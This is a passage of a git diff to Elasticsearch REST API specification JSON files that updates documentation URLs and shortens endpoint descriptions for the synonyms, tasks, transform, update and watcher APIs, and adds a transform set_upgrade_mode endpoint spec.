b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json index 9273a8dea87c3..8e57140c98db2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym.json @@ -1,8 +1,8 @@ { "synonyms.delete_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-synonyms-set.html", - "description": "Deletes a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-delete-synonym", + "description": "Delete a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json index e2285bbd6d4ae..27f1f8a0e6c3d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.delete_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.delete_synonym_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-synonym-rule.html", - "description": "Deletes a synonym rule in a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-delete-synonym-rule", + "description": "Delete a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json index 25c177cabbdf1..0ad768f17af2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym.json @@ -1,8 +1,8 @@ { "synonyms.get_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-synonyms-set.html", - "description": "Retrieves a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym", + "description": "Get a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json index ff9e7eb57b8a7..6d2ffa94454f2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.get_synonym_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-synonym-rule.html", - "description": "Retrieves a synonym rule from a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym-rule", + "description": "Get a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json index d94bef32cddcd..ebe170994f534 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.get_synonyms_sets.json @@ -1,8 +1,8 @@ { "synonyms.get_synonyms_sets": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-synonyms-sets.html", - "description": "Retrieves a summary of all defined synonym sets" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym", + "description": "Get all synonym sets" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json index 3e700163e1738..627f364a465ea 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym.json @@ -1,8 +1,8 @@ { "synonyms.put_synonym": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-synonyms-set.html", - "description": "Creates or updates a synonyms set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym", + "description": "Create or update a synonym set" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json index 55edd65a8beb2..f0a028ecbe9e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/synonyms.put_synonym_rule.json @@ -1,8 +1,8 @@ { "synonyms.put_synonym_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-synonym-rule.html", - "description": "Creates or updates a synonym rule in a synonym set" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym-rule", + "description": "Create or update a synonym rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json index 525c72aaa2748..039dd8770a858 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.cancel.json @@ -1,8 +1,8 @@ { "tasks.cancel":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Cancels a task, if it can be cancelled through an API." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Cancel a task" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json index 0863e05b97f93..3b3a3b94c84e5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.get.json @@ -1,8 +1,8 @@ { "tasks.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns information about a task." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Get task information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json index 058ff36368308..ce3098994fac6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/tasks.list.json @@ -1,8 +1,8 @@ { "tasks.list":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns a list of tasks." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks", + "description":"Get all tasks" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json b/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json index 1050eb4b18fe8..ee13ef6a464f0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/terms_enum.json @@ -1,8 +1,8 @@ { "terms_enum":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/search-terms-enum.html", - "description": "The terms enum API can be used to discover terms in the index that begin with the provided string. It is designed for low-latency look-ups used in auto-complete scenarios." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-terms-enum", + "description": "Get terms in an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json b/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json index de8cfc684b36a..57bbc21b260f6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/termvectors.json @@ -1,8 +1,8 @@ { "termvectors":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-termvectors.html", - "description":"Returns information and statistics about terms in the fields of a particular document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-termvectors", + "description":"Get term vector information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json index f82e2ca2d190f..2674dd5b4dffb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_field_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_field_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-field-structure.html", - "description":"Finds the structure of a text field in an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-text_structure", + "description":"Find the structure of a text field" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json index d839e4b048f7d..852607cb4296f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_message_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_message_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-message-structure.html", - "description":"Finds the structure of a list of messages. The messages must contain data that is suitable to be ingested into Elasticsearch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-message-structure", + "description":"Find the structure of text messages" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json index c244db7aa8351..64370a67e617c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.find_structure.json @@ -1,8 +1,8 @@ { "text_structure.find_structure":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/find-structure.html", - "description":"Finds the structure of a text file. The text file must contain data that is suitable to be ingested into Elasticsearch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-structure", + "description":"Find the structure of a text file" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json index b291ce6b87e8e..c8ee70313d31c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/text_structure.test_grok_pattern.json @@ -1,8 +1,8 @@ { "text_structure.test_grok_pattern": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/test-grok-pattern.html", - "description": "Tests a Grok pattern on some text." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-test-grok-pattern", + "description": "Test a Grok pattern" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json index 1af53ec0e8c3a..b9f1b7419568a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.delete_transform.json @@ -1,8 +1,8 @@ { "transform.delete_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-transform.html", - "description":"Deletes an existing transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-delete-transform", + "description":"Delete a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json index ca3fde65f6363..a4c1fdc5b0ca2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_node_stats.json @@ -2,7 +2,7 @@ "transform.get_node_stats":{ "documentation":{ "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform-node-stats.html", - "description":"Retrieves transform usage information for transform nodes." + "description":"Retrieves transform usage information for transform nodes" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json index 334537d49a716..f47c5eedd0ba5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform.json @@ -1,8 +1,8 @@ { "transform.get_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform.html", - "description":"Retrieves configuration information for transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform", + "description":"Get transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json index 8139fac7a818e..3805804becb13 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.get_transform_stats.json @@ -1,8 +1,8 @@ { "transform.get_transform_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-transform-stats.html", - "description":"Retrieves usage information for transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform-stats", + "description":"Get transform stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json index 5740f5d9ab2e0..f55b8631aacf9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.preview_transform.json @@ -1,8 +1,8 @@ { "transform.preview_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/preview-transform.html", - "description":"Previews a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-preview-transform", + "description":"Preview a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json index 5f4b986d831ef..9e10a8b9189a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.put_transform.json @@ -1,8 +1,8 @@ { "transform.put_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-transform.html", - "description":"Instantiates a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-put-transform", + "description":"Create a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json index d86b9290e8dac..f9fedf2e63cbd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.reset_transform.json @@ -1,8 +1,8 @@ { "transform.reset_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/reset-transform.html", - "description":"Resets an existing transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-reset-transform", + "description":"Reset a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json index 81ba9e071cfd1..849670fd6b63b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.schedule_now_transform.json @@ -1,8 +1,8 @@ { "transform.schedule_now_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/schedule-now-transform.html", - "description":"Schedules now a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-schedule-now-transform", + "description":"Schedule a transform to start now" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json new file mode 100644 index 0000000000000..32e2afdebad13 --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.set_upgrade_mode.json @@ -0,0 +1,33 @@ +{ + "transform.set_upgrade_mode":{ + "documentation":{ + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-set-upgrade-mode", + "description":"Set upgrade_mode for transform indices" + }, + "stability":"stable", + "visibility":"public", + "headers":{ + "accept": [ "application/json"] + }, + "url":{ + "paths":[ + { + "path":"/_transform/set_upgrade_mode", + "methods":[ + "POST" + ] + } + ] + }, + "params":{ + "enabled":{ + "type":"boolean", + "description":"Whether to enable upgrade_mode Transform setting or not. Defaults to false." + }, + "timeout":{ + "type":"time", + "description":"Controls the time to wait before action times out. Defaults to 30 seconds" + } + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json index b7fb849987afb..624ffa430bd20 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.start_transform.json @@ -1,8 +1,8 @@ { "transform.start_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/start-transform.html", - "description":"Starts one or more transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-start-transform", + "description":"Start a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json index 1beb8066c1803..6de4567b6ae4d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.stop_transform.json @@ -1,8 +1,8 @@ { "transform.stop_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/stop-transform.html", - "description":"Stops one or more transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-stop-transform", + "description":"Stop transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json index 61734de8bef78..12ced0c2b551c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.update_transform.json @@ -1,8 +1,8 @@ { "transform.update_transform":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-transform.html", - "description":"Updates certain properties of a transform." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-update-transform", + "description":"Update a transform" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json index 0ad1412d06e9e..8484ff2b811f3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/transform.upgrade_transforms.json @@ -1,8 +1,8 @@ { "transform.upgrade_transforms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/upgrade-transforms.html", - "description":"Upgrades all transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-upgrade-transforms", + "description":"Upgrade all transforms" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update.json index 9e47e80547e88..6486e0a4f3c3e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update.json @@ -1,8 +1,8 @@ { "update":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update.html", - "description":"Updates a document with a script or partial document." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update", + "description":"Update a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json index 8cf44f289ce01..0af360fb24eaa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query.json @@ -1,8 +1,8 @@ { "update_by_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-update-by-query.html", - "description":"Performs an update on every document in the index without changing the source,\nfor example to pick up a mapping change." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query", + "description":"Update documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json index 18895ad443c6f..c76fcbaeb3353 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/update_by_query_rethrottle.json @@ -1,8 +1,8 @@ { "update_by_query_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-update-by-query.html", - "description":"Changes the number of requests per second for a particular Update By Query operation." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query-rethrottle", + "description":"Throttle an update by query operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json index 0c04888991fc5..7946eba4296a5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.ack_watch.json @@ -1,8 +1,8 @@ { "watcher.ack_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-ack-watch.html", - "description":"Acknowledges a watch, manually throttling the execution of the watch's actions." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-ack-watch", + "description":"Acknowledge a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json index 698b08f3fdc8a..1b26599ec6aed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.activate_watch.json @@ -1,8 +1,8 @@ { "watcher.activate_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-activate-watch.html", - "description":"Activates a currently inactive watch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-activate-watch", + "description":"Activate a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json index e9b7407eb5c9d..505500c61a438 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.deactivate_watch.json @@ -1,8 +1,8 @@ { "watcher.deactivate_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-deactivate-watch.html", - "description":"Deactivates a currently active watch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-deactivate-watch", + "description":"Deactivate a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json index 9417a8a57b56b..881fddcb1d7a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.delete_watch.json @@ -1,8 +1,8 @@ { "watcher.delete_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-delete-watch.html", - "description":"Removes a watch from Watcher." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-delete-watch", + "description":"Delete a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json index a011669ce373c..395f7512be0e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.execute_watch.json @@ -1,8 +1,8 @@ { "watcher.execute_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-execute-watch.html", - "description":"Forces the execution of a stored watch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-execute-watch", + "description":"Run a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json index 3ae59c9d024a7..ef02edd190cb8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_settings.json @@ -1,8 +1,8 @@ { "watcher.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-get-settings.html", - "description":"Retrieve settings for the watcher system index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-settings", + "description":"Get Watcher index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json index 26899aefc53bb..c03842bebee1d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.get_watch.json @@ -1,8 +1,8 @@ { "watcher.get_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-get-watch.html", - "description":"Retrieves a watch by its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-watch", + "description":"Get a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json index 462580198932c..090bf2f799dca 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.put_watch.json @@ -1,8 +1,8 @@ { "watcher.put_watch":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-put-watch.html", - "description":"Creates a new watch, or updates an existing one." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-put-watch", + "description":"Create or update a watch" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json index b730f66af3617..4b2d49bc09bda 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.query_watches.json @@ -1,8 +1,8 @@ { "watcher.query_watches":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/watcher-api-query-watches.html", - "description":"Retrieves stored watches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-query-watches", + "description":"Query watches" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json b/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json index ad0682c8d7b19..c77b5f46b75a6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/watcher.start.json +++ 